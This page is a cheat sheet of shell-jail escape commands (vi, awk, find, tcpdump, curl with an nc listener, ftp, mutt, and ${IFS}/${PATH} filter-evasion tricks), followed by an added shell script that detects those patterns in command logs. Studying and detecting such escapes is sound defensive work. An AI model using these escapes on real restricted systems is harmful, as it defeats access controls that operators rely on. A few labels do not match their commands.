Break Out Of Jail / Shell Escaping Techniques
Discover powerful shell escaping techniques to break out of restricted environments. Learn how to execute commands inside vi/vim, leverage awk, find, tcpdump, curl, ftp, mutt, and clever bash commands to escape jails and gain control.
Executing Commands Inside vi/vim
vi
:set shell=/bin/sh
:shell
Command Execution
:! /bin/bash
awk
awk 'BEGIN {system("/bin/sh")}'
find
find / -name 0xffsec -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
tcpdump
tcpdump -n -G 1 -z /usr/bin/php -U -A udp port 8080
curl
curl -T@`/bin/sh` localhost
curl
nc -lvvp 1337
curl -T"/bin/sh" http://127.0.0.1:1337
ftp
!/bin/sh
mutt
sh
ls${IFS};sh${IFS}
List root folder in bash
l${u}s ${PATH:0:1}
List /usr folder in bash
l${u}s ${PATH:0:4}
Print $PATH
echo ${PATH:0}
Print /us with rev
echo ${PATH:2:3}
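A detection-side counterpart to the commands above, as an added example that is not part of the original page: a POSIX shell filter that tags command lines matching the awk, find, tcpdump, curl and bash variable-expansion patterns listed here. The input format (one executed command line per line) and the tag names are assumptions. Escapes typed inside vi, ftp or mutt do not appear in a command line and are not covered by it.

```shell
#!/bin/sh
# Added example: tag command lines that match the escape patterns on this page.
# Assumption: input is one executed command line per line (for instance argv
# joined from process-execution audit records). Tag names are hypothetical.

# has STRING ERE -> success if STRING matches the extended regex.
has() { printf '%s\n' "$1" | grep -Eq -- "$2"; }

# classify_cmd CMDLINE -> prints space-separated tags, empty if nothing matched.
classify_cmd() {
    cmd=$1
    tags=""
    # ${IFS} used in place of a literal space between words
    has "$cmd" '[$][{]IFS[}]' && tags="$tags ifs-separator"
    # ${PATH:N:M} used to build "/" or "/usr" without typing the characters
    has "$cmd" '[$][{]PATH:[0-9]+(:[0-9]+)?[}]' && tags="$tags path-substring"
    # a variable spliced into the middle of a word, as in l${u}s
    has "$cmd" '[A-Za-z][$][{][A-Za-z_][A-Za-z0-9_]*[}][A-Za-z]' && tags="$tags var-splice"
    # awk calling system(), find -exec, tcpdump -z, curl -T
    has "$cmd" 'awk.*system[(]' && tags="$tags awk-system"
    has "$cmd" '(^|[/ ])find .* -exec ' && tags="$tags find-exec"
    has "$cmd" '(^|[/ ])tcpdump (.* )?-z ' && tags="$tags tcpdump-z"
    has "$cmd" '(^|[/ ])curl (.* )?-T' && tags="$tags curl-upload"
    printf '%s\n' "${tags# }"
}

# scan: read command lines on stdin, print "tags<TAB>line" for each flagged one.
scan() {
    while IFS= read -r line; do
        t=$(classify_cmd "$line")
        [ -n "$t" ] && printf '%s\t%s\n' "$t" "$line"
    done
    return 0
}

# Constructed sample input: commands from this page mixed with benign ones.
sample_log() {
    cat <<'EOF'
ls -la /var/log
awk 'BEGIN {system("/bin/sh")}'
find / -name 0xffsec -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
tcpdump -n -G 1 -z /usr/bin/php -U -A udp port 8080
ls${IFS};sh${IFS}
l${u}s ${PATH:0:1}
curl -s https://example.com/status
EOF
}

sample_log | scan
```

The var-splice rule fires on any variable placed mid-word, whether or not it is unset, so treat it as a triage signal rather than a verdict.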